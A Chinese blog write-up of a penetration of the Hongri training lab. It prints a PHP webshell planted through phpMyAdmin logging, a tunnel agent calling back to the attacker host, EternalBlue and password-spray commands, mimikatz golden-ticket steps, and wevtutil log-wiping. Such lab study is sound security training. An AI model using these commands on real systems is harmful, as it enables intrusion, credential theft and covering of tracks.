文章总结: 本文记录了红日靶场内网渗透全过程,涵盖环境搭建、外网打点、内网横向及权限维持。通过PHPMyAdmin日志写入获取WebShell,利用CobaltStrike与Venom搭建隧道,结合永恒之蓝漏洞与PTH横向移动渗透域控,最终通过黄金票据维持权限并清理痕迹,实战参考价值较高。
综合评分: 85
文章分类: 内网渗透,渗透测试,红队
记一次内网靶场渗透
原创
陌笙
陌笙
陌笙不太懂安全
2026年2月1日 16:58
河北
免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号陌笙不太懂安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!
靶场介绍
红日靶场1是一个高度仿真的内网渗透靶场,包含一个DMZ区Web服务器(双网卡)和一个内部域环境。目标是从外网突破,获取DMZ区服务器权限,并以此为跳板,深入内网域环境,最终夺得域控制器的完全控制权。
网络拓扑
虚拟靶机下载地址
https://pan.baidu.com/s/1ZsZ8V_dyUA96wdpLViX-LA?from=init&pwd=iw1s#list/path=%2F
三台虚拟机的初始密码都是:hongrisec@2019,第一次搭建会提示密码以过期,修改密码,更改为 test@123 即可,三台虚拟机都要修改,要不然就会出现我后续的同款问题。
环境配置
win7配置
从网络拓扑图可知,需要模拟内网和外网两个网段,Win7虚拟机相当于网关服务器,所以需要两张网卡,
将 Win7 的网络适配器 1 设置成 NAT 模式(外网),网络适配器 2 设置成 VMnet1 仅主机模式(内网)
windows server 2008 (DC域控)
Win2K3 Metasploitable(域内成员)
kali
设置为nat就行
注意事项
网卡1(仅主机网卡):设置为192.168.52.0,否则后面win7的web服务无法开启,并将win7的nat网卡对应的dns修改为域控的ip地址,
也就是修改为192.168.52.138。还有第一次重启的时候小皮面板会报错,需要重启一下win7,配置完成之后,使用主机对各个网段的ip地址进行测试即可,kali能通win7不能通52.0网段,win7可以通52.0网段,如果还有其他问题,自行百度。
渗透基本环境
kali 外网 192.168.172.130win7 外网 192.168.172.128 内网 192.168.52.128win11 外网 192.168.172.1DC域控 内网192.168.52.138域成员 内网192.168.52.141
渗透测试-外网打点
假设我们已经通过各种信息收集获取到目标的ip下面开始渗透
先用fscan进行简单扫描
fscan.exe -h 192.168.172.1/24
fscan结果资产整理
通过对结果进行整理分析,发现目标存在一个phpstudy探针,以及永恒之蓝漏洞
访问查看
这里泄露了网站绝对路径,记录下来,没有什么其他的突破点,扫描目录瞅瞅
可以看到泄露了phpinfo页面,以及扫到了phpmyadmin后台页面和备份文件
访问phpmyadmin
尝试几个弱口令admin/123456 admin/admin123都不成功,模仿实战,就不百度看报告了,直接漏洞扫一下。
看了一下用户名和密码都是root登录进入后台
phpmyadmin可以尝试直接写,也可以通过日志写,这里直接写先查看一下
需要当前数据库用户拥有写权限写权限的相关参数为:secure_file_priv查看 secure_file_priv 的sql语句: show global variables like '%secure_file_priv%'; secure_file_priv参数的含义: NULL 不允许导入或导出 /tmp 只允许在 /tmp 目录导入导出 空 不限制目录
1.查看权限show global variables like '%secure_file_priv%';# 2.写入一句话木马select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'C:\\test.php'
显然不能直接写,尝试通过日志写
1.查看当前日志记录的设置SHOW VARIABLES LIKE 'general%';
# 2. 开启日志记录set global general_log = "ON";# 3. 更改日志记录的位置set global general_log_file='C:\\phpStudy\\WWW\\shell.php'
使用格斯拉生成木马进行写入
4. 向日志内写入 一句话木马select '<?php @eval($_POST["pass"]);?>';
尝试访问木马出现这个页面,说明木马成功解析
使用哥斯拉成功连接,getshell->web服务器
拿到shell之后,先whoami查看权限,管理员
在tasklist看看有没有杀软,没有
确定一下当前是否在域内(net config workstation),在god.org域内,当前主机为stu1.god.org
查看一下网段情况
存在两个网段
网段1:192.168.172.0
网段2:192.168.52.0
定位一下域控,192.168.52.138
ok开始上线cs打内网
kali作为服务器启动cs
本机使用客户端进行连接
连接成功之后
先创建一个http监听器
生成木马传到web服务器执行之后上线cs,太简单了,就不一一截图了
成功上线
然后修改会话间隔
上之后先关防火墙,养成好习惯,可以直接进行命令。
shell netsh firewall set opmode disable # windows 2003之前shell netsh advfirewall set allprofiles state off # windows 2003之后
然后翻翻密码信息
知道是phpstudy搭建的我们可以翻翻密码信息,后面做密码喷洒啥的
C:/phpstudy/MySQL/data/mysql/user.MYD
尝试解密
yxcms的密码(这次没用到这个点)
C:/phpstudy/www/yxcms/protected/config.php
刚才进程里面没有向日葵啥的,可以传个抓取浏览器密码的工具抓抓看,这里就算了,继续往后打
按照之间听课的逻辑,现在应该确定一下,内网网段内哪些主机是存活的,开放了哪些端口和服务,可以使用查看arp缓存表或者路由表的方式慢慢确定,也可以直接使用cs自带功能探测,前面我们已经知道没有杀软,直接上fscan梭哈
一般域控所在网段就是核心网段,我们直接使用fscan扫描这个网段
这里不方便查看直接复制出去使用工具进行查看
通过这里整理可以发现
存活ip192.168.52.138192.168.52.141
且都存在永恒之蓝以及52.141存在ftp匿名登录漏洞
这里我的想法是搭建隧道,然后使用永恒之蓝
直接拿下整个域。
在此之前先确定一下又几个域。
ok只有一个,上传毒液搭建隧道代理,msf使用代理,打永恒之蓝getshell.
现在kali(vps)开启毒液的服务端
/admin_linux_x64 -lport 2222 -passwd test123456
然后getshell的机器上传客户端并运行
shell agent.exe -rhost 192.168.172.130 -rport 2222 -passwd test123456
节点成功上线,跳转到节点1搭建socks5代理
goto 1
socks 1000
测试代理可行性
成功,直接在kali里面进行配置代理,然后使用msf打永恒之蓝
配置成功之后直接挂着代理启动msf
直接使用这个模块打,直接拿shell的模块,容易蓝屏
use auxiliary/admin/smb/ms17_010_commandset rhost 192.168.152.138set command whoamirun
成功在域控执行命令
上面我们知道域成员也存在永恒之蓝,同理也测试一下,依旧执行命令成功
没打过内网,我的理念里面这样就可以了,后面看看别人的文章
又学到了,这里可以先探测一下,存活的主机
然后抓取一下上线主机的明文密码以及hash值,后续用来横向,我这里有很多是因为,写文章之前打过一遍,一般用administrator的就行
administrator/test@123
因为不知道哪个主机和我们的密码相同使用工具进行密码喷洒尝试
proxychains crackmapexec smb 192.168.52.0/24 -u administrator -p test@123
成功碰撞出密码相同主机192.168.52.138/192.168.52.141,但是这个实际环境可能流量有点大
尝试pth横向
哈希传递攻击:
在 kerberos、NTLM 认证过程的关键,首先就是基于用户密码 Hash 的加密,所以在域渗透中,无法破解用户密码 Hash 的情况下,也可以直接利用 Hash 来完成认证,达到攻击的目的,这就是 hash 传递攻击(Pass The Hash,简称 PTH)。如果内网主机的本地管理员账户密码相同,那么可以通过 PTH 远程登录到任意一台主机。
攻击流程:
获得一台域控主机的权限,Dump内存获得该主机的用户密码Hash值;通过哈希传递攻击尝试登录其他主机;继续收集哈希并尝试远程登录,知道获得域管理员Hash,登录域控,控制整个域。
首先:提权到system权限:
一是当前的权限是administrator用户;
二是利用其它手段先提权到administrator用户。然后administrator用户可以直接在meterpreter_shell中使用命令getsystem提权到system权限,如果使用的是cs,这里利用cs自带功能尝试提权就行。
cs提权,点击凭证提权,权限提升。
选择我们的http监听器监听点击launch即可,等待几分钟成功上线
先创建一个smb监听器
SMB监听隧道的核心原理是利用SMB协议在目标主机上建立隐蔽的通信通道,绕过传统防火墙和入侵检测系统的监控。SMB协议基础:文件共享,域名解析等,默认通过445端口通信
点击攻击列表
选中目标主机右键psexec进行横向
添加 用户名 密码 域名 -> 监听器 -> 对端连接的隧道监听器选择我们刚刚创建的SMB监听器,对端连接的隧道选择system权限的
后续三台机子成功全部上线,以为到这就结束了,竟然还有后续
黄金票据
选中域控,先点击抓取明文(右键凭证获取抓取明文密码即可),主要是为了看用户
(这里正常应该是administrator我这里有点问题不过不影响学习制作)
接下来我们来看域
GOD.ORG
在读取一下sid
nt authority\system S-1-5-18
最后我们在点击获取哈希值,即可去创建我们的黄金票据了
58e91a5ac358d86513ab224312314061
然后我们点创建黄金票据
等待片刻,成功生成
然后我们来验证一下
run klist
光生成没有用,我们得创建,然后下载下来,我们先切换位置在生成文件
我这里切换到的是C:\位置,然后我们生成黄金票据
mimikatz kerberos::list /export
可以看到我们已经生成了两条
0-60a00000-Administrator@krbtgt~GOD.ORG-GOD.ORG.kirbi
1-40e00000-Administrator@krbtgt~GOD.ORG-GOD.ORG.kirbi
接下里我们来查看一下是否生成成功,或者是否能够查看到
shell dir C:\*.kirbi
可以看到确实存在,下载下来
download 0-60a00000-Administrator@krbtgt~GOD.ORG-GOD.ORG.kirbidownload 1-40e00000-Administrator@krbtgt~GOD.ORG-GOD.ORG.kirbi
通常下载后的默认文件夹是server/download的文件夹,也就是cs文件夹里面的server文件夹
黄金票据作用
在拿到票据后我给你们解释这个作用,黄金票据就是当你被下线后,你又成功掌控了一个内网电脑,你就可以上传这个票据,在使用命令使用,你就可以恢复你域掌控者的身份了
mimikatz kerberos::ptt [email protected]
痕迹清除
shell wevtutil cl security //清理安全日志shell wevtutil cl system //清理系统日志shell wevtutil cl application //清理应用程序日志shell wevtutil cl "windows powershell" //清除power shell日志shell wevtutil cl Setup //清除(cl)事件日志中的 "Setup" 事件。
参考文章
https://www.cnblogs.com/Afa1rs/p/18870098https://blog.csdn.net/mc11451419198/article/details/150070176
常用命令
net view # 查看局域网内其他主机名net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域net user # 查看本机用户列表net user /domain # 查看域用户net localgroup administrators # 查看本地管理员组(通常会有域用户)net view /domain # 查看有几个域net user 用户名 /domain # 获取指定域用户的信息net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)net group 组名 /domain # 查看域中某工作组net group "domain admins" /domain # 查看域管理员的名字net group "domain computers" /domain # 查看域中的其他主机名net group "doamin controllers" /domain # 查看域控制器主机名(可能有多台)
后台私信回复加群加入交流群
有思路工具需要的师傅可以加入小圈子
主要内容是(2025-2026/edusrc实战报告/edu资产/漏洞挖掘工具等) 其他内容懂得都懂,持续更新中
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:陌笙不太懂安全 陌笙
陌笙《记一次内网靶场渗透》